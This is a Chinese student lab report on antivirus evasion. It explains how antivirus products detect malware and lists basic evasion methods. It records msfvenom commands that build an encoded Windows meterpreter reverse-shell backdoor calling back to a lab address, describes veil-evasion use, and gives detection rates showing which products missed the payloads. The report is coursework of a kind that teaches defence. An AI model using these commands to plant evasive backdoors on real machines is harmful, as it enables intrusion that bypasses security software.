您的位置：首页 > 理论基础 > 计算机网络

20145329 《网络对抗技术》免杀原理与实践

2017-03-26 21:53 423 查看

实践内容：

(1)理解免杀技术原理(1分)

(2)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧；(2分)

(3)通过组合应用各种技术实现恶意代码免杀(1分)

(4)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（1分）

1.基础问题回答

杀软是如何检测出恶意代码的？

1.通过对文件代码的特征检测

2.通过对文件代码的观察，看它的基本信息，来源，文件属性等

3.通过对文件行为的监测，文件代码在工作时候的作为是否是有目标功能的

免杀是做什么？

构造一些能够躲过杀毒软件的检测，或者在检测之后不被杀掉。

免杀的基本方法有哪些？

1.改变特征码，对木马文件进行冲编码或者对它的原本的编码方式加以掩饰，即尽量不要使文件代码符合或接近恶意代码检测库里面对代码特征的统计，而使之被检测为恶意代码

2.改变行为，用被动的方式实现主动攻击的目标或者将恶意代码加入正常功能的代码中，伴随正常代码一起被执行

3.使用专门的辅助工具协助恶意代码成功植入靶机

2.实践总结与体会

本次实验是基于防护的原则进行的免杀病毒入侵的操作，发现计算机虽然几乎是个集结了世界上最聪明的一群人制造出来的产品，但是还是存在着很多很多的可以让黑客钻空子的漏洞，因为开发者创造产品的理念是基于实用、方便、安全等等诸多的目的开始的研发，要考虑方方面面，就难以把方方面面都考虑周全，而攻击者仅仅是基于破坏的原则做研究，所以成功的几率更大。之前觉得互联网中我们是与现实的关联是透明的，没有人看到，实际发现其实这层保护是很脆弱的。

3.离实战还缺些什么

目前我们所做的所有操作都是基于对靶机的一定了解，比如掌握IP信息，或者要求靶机配合接收传输的木马文件，而且木马一般都会被杀掉。要在实战中好的实现攻击，还需要对攻击方法的过程更加了解和更好的木马代码，以及对电脑系统漏洞的掌握。

4.实践过程记录

1.理解免杀技术原理

免杀技术是为了掩饰植入目标靶机的文件的恶意代码属性而使用的一系列技术和措施使得文件躲过靶机的杀毒软件的查杀，而成功植入靶机。

2.正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧；

msf编码器生成

使用msf编码器生成一个后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded.exe

文件传送到windows以后被查杀，找回后上传到virscan扫描，有21/39款杀软鉴定它为恶意代码

使用msf编码器对恶意代码进行10次编码，并生成一个后门文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded10.exe

文件传送到windows以后仍然被查杀

找回后上传到virscan扫描，有20/39款杀软鉴定它为恶意代码

对比查杀分析信息后发现其中一个名为Quickheal的杀软没有检测出多次编码后的恶意代码，说明这个杀软比较弱，不过也说明多次编码对个别杀软是有一定作用的，不过整体来讲对恶意代码成功植入靶机还是几率不大

360安全卫士检测出以上msf编码器编码的两个恶意代码

veil-evasion

kali原本没有veil-evasion ，所以需要先安装

sudo ape-get install veil-evasion

menu下依次输入语言、ip、端口号以及文件名等

将生成的可执行文件传送到windows，传送时windows杀软没有检测到文件为恶意代码并杀死它

在windows文件中找到恶意代码（5329.exe），上传到virscan扫描发现有10/39款杀软识别出它是恶意代码（算是挺高的检测率了，然而我的360安全卫士却没有检测出它，看来这款杀软也不是很厉害，应该换一个）